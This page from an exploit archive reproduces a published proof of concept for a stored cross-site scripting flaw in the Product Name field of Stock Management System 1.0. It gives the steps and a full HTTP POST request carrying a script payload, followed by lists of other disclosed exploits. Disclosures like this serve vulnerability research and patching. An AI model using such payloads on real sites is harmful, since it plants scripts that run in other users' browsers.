Menu

Search for hundreds of thousands of exploits

"Stock Management System 1.0 - 'Product Name' Persistent Cross-Site Scripting"

Author

Exploit author

"Adeeb Shah"

Platform

Exploit platform

php

Release date

Exploit published date

2020-10-21

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
# Exploit Title: Stock Management System 1.0 - Persistent Cross-Site Scripting (Product Name)
# Exploit Author: Adeeb Shah (@hyd3sec)
# Date: August 2, 2020
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/14366/stock-management-system-php.html
# Version: 1.0
# Tested On: Windows 10 (x64_86) + XAMPP 7.4.4


# Vulnerability Details
# Description A persistent cross-site scripting vulnerability exists within the 'Product Name' parameter in the Edit Product function.
# This example allows a logged-in user to inject javascript code as a persistent XSS attack which is persistent on any page with the Product Name value expected.

#Steps:

	1. Log in with admin privileges (use credentials or use the Auth Login Bypass exploit)

	2. Click "Product"

	3. Click "Action" in any categories name row

	4. Click Edit, then Product Info (tab)

	5. In "Product Name" field enter XSS <script>alert("XSS")</script>

	6. Click save changes

	7. Any page on the webapp expecting that 'Product Name' will trigger the XSS.



POST /stock/php_action/editProduct.php HTTP/1.1
Host: 192.168.222.132
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.222.132/stock/product.php
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------147762840819880874581057152477
Content-Length: 938
DNT: 1
Connection: close
Cookie: PHPSESSID=1halobmiaq86oi70ogliu0qlh8


-----------------------------147762840819880874581057152477
Content-Disposition: form-data; name="editProductName"


<script>alert("hyd3sec")</script>
-----------------------------147762840819880874581057152477
Content-Disposition: form-data; name="editQuantity"


9
-----------------------------147762840819880874581057152477
Content-Disposition: form-data; name="editRate"



1200
-----------------------------147762840819880874581057152477
Content-Disposition: form-data; name="editBrandName"


12
-----------------------------147762840819880874581057152477
Content-Disposition: form-data; name="editCategoryName"



7
-----------------------------147762840819880874581057152477
Content-Disposition: form-data; name="editProductStatus"



1
-----------------------------147762840819880874581057152477
Content-Disposition: form-data; name="productId"


8
-----------------------------147762840819880874581057152477--
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-10-21 "Stock Management System 1.0 - 'Product Name' Persistent Cross-Site Scripting" webapps php "Adeeb Shah"
2020-10-21 "Stock Management System 1.0 - 'Categories Name' Persistent Cross-Site Scripting" webapps php "Adeeb Shah"
2020-10-21 "Stock Management System 1.0 - 'Brand Name' Persistent Cross-Site Scripting" webapps php "Adeeb Shah"
2020-09-03 "Daily Tracker System 1.0 - Authentication Bypass" webapps php "Adeeb Shah"
2020-08-05 "Stock Management System 1.0 - Authentication Bypass" webapps php "Adeeb Shah"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.